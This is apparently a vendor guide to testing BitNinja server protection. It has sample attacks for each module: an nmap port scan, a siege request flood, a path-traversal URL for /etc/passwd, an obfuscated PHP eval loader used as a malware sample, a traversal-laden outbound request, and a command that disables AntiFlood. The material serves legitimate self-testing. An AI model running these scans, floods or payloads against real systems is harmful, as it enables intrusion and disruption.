Testing BitNinja

This section helps you test your BitNinja installation and the protection it provides.

General considerations

You can watch a webinar recording with George Egri, CEO of BitNinja, presenting all these tests on our YouTube channel here: https://www.youtube.com/bitninjaio

Note

Before you start testing the bitninja protection, please consider these notes about the system:

1. BitNinja is designed not to tolerate testing of its protection, as that’s what bad guys do before an attack. A specific module, AntiFlood, is responsible for collecting incidents from the other modules and blacklisting the IP if there are too many incidents. To bypass this protection while testing, you have to disable the AntiFlood module using the following command:

bitninjacli --module=AntiFlood --stop


2. To avoid whitelisting issues, the BitNinja cloud does not accept any incidents for 1 minute after a successful IP delisting via the CAPTCHA module.

3. The BitNinja agent sends incidents in batches, not one by one, to avoid making things even worse in case of a distributed attack. This may cause a lag between raising an incident with a test attack and seeing it on the dashboard.

To run the test attacks we usually use a Vagrant Ubuntu 16.04 Linux box.

Here is a minimal Vagrantfile you can use:

Vagrant.configure(2) do |config|
  config.vm.box = "bento/ubuntu-16.04"
  config.vm.provider "virtualbox" do |v|
    v.memory = 2000
    v.cpus = 2
    v.customize ["modifyvm", :id, "--ostype", "Ubuntu_64"]
  end

  config.vm.hostname = "attacker"
end

You can use the https://admin.bitninja.io management interface to see the incidents. You can also see the logs in /var/log/bitninja. It is important to know that when BitNinja greylists an IP, it closes all real services to that IP. So if you use your own IP address to simulate the attack and you are logged in via SSH from the same IP, your SSH session will be terminated once the IP has been greylisted.
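A small pre-flight check for the lockout caveat above, written here as an added example (it is not part of BitNinja or its tooling): it compares the attacker address you intend to use with the client address of your current SSH session, read from the standard SSH_CONNECTION environment variable, and refuses to continue if they are the same. The function names are this example's own.

```shell
#!/bin/sh
# Lockout pre-flight check (added example, not BitNinja's own tooling).
# BitNinja greylists the attacking IP and closes all real services to it,
# so the test attacks must never come from the IP your admin SSH session uses.

# Extract the client address from an SSH_CONNECTION value, whose format is
# "client_ip client_port server_ip server_port".
ssh_client_ip() {
    printf '%s\n' "$1" | awk '{print $1}'
}

# Return 0 (safe) if the attacker IP differs from the SSH client IP,
# 1 (unsafe: you would lock yourself out) if they match or the session is unknown.
attack_ip_is_safe() {
    attacker="$1"
    session="$2"
    client=$(ssh_client_ip "$session")
    [ -n "$client" ] && [ "$client" != "$attacker" ]
}

# Run on the server before starting any test attack:  preflight "$ATTACKER_IP"
preflight() {
    attacker="$1"
    if [ -z "${SSH_CONNECTION:-}" ]; then
        echo "not an SSH session, greylisting cannot cut this shell off" >&2
        return 0
    fi
    if attack_ip_is_safe "$attacker" "$SSH_CONNECTION"; then
        echo "ok: attacker $attacker differs from SSH client $(ssh_client_ip "$SSH_CONNECTION")" >&2
        return 0
    fi
    echo "refusing: attacker IP $attacker is this session's own client IP; greylisting it would terminate this SSH session" >&2
    return 1
}
```

Run the test attacks from the Vagrant box only after preflight reports ok for that box's address.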

Test port scan protection

To prepare your server, switch on the Port Honeypot module.

To prepare your attacker machine, install nmap first:

apt-get install nmap

Now you can start the port scan to simulate the attack vector.

nmap [IP of your server]

Test DoS protection

The DoS detection module is on by default.

To prepare your attacker machine, install the siege package on it:

apt-get install siege

Now you can start the flood of concurrent requests to simulate the attack vector.

siege -c100 http://[your server]

Test the Web Application Firewall

To prepare your server, switch on the Web Application Firewall module. You can run this test from a simple web browser:

http://[domain of any sites]/info.php?file=/etc/passwd

BitNinja should block the connection. Then, if you use Chrome, it will retry the connection, and this time, as your IP has been greylisted, the CAPTCHA page will appear.

Test log analysis

The logdetection module is active by default. To prepare your server for the test, create a file called plugin_googlemap2_proxy.php; or, if you host any Joomla sites that use this extension, you can use one of those for testing the log analyzer. Open the URL below in a browser several times. It will soon trigger the log analyzer and greylist your IP.

http://[your domain]/plugin_googlemap2_proxy.php

Testing Malware Detection

To test the Malware Detection module, first enable the module. If you are using BitNinja version 1.17.1 or later, you also have to enable the quarantine option in the module’s config.ini file. Then place a malware sample in the /tmp directory (or in any other enabled directory). The Malware Detection module will immediately quarantine it. You can find the quarantined files in /var/lib/bitninja/quarantine or on the https://admin.bitninja.io admin panel under the Files menu.

To create a malware sample for testing purposes, copy and paste the following code into a file in the /tmp directory and save it.

<?php eval(gzinflate(str_rot13(base64_decode('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')))); ?>

Test the Outbound WAF

To test the outbound web application firewall, first enable it. To prepare your server, create a PHP file with this content:

<?php
// Outbound request carrying a path-traversal pattern; the outbound WAF should intercept it.
$result = file_get_contents('http://example.com/info.php?file=../../../config.php');
var_dump($result); // expected: bool(false) when the outbound WAF blocks the request

Save this file as backdoor-test.php and then open it with a browser.

http://[domain]/backdoor-test.php

The $result variable should contain false, because the outbound WAF module intercepts the connection, and on the https://admin.bitninja.io admin panel you can list the resulting information under the Files menu.